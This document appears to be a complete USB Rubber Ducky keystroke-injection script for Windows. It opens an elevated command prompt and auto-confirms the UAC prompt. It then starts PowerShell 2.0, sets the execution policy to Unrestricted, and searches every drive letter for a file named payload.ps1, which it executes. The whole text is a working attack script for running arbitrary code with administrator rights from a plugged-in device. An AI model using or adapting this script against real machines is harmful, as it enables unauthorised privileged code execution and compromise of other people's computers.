DELAY 3000
GUI d
GUI r 
DELAY 250  
STRING powershell -noprofile Start-Process cmd -Verb runAs 
ENTER
DELAY 750  
ALT y 
ENTER
DELAY 250
STRING powershell -version 2 -noexit -noprofile Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 250
STRING $alpha = 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'
ENTER
STRING Do{$alpha | %{$DuckyTest = "$_`:\payload.ps1"; if(test-path $DuckyTest){$DuckyScript = $DuckyTest}}}While(!($DuckyScript))
ENTER 
STRING & $DuckyScript
ENTER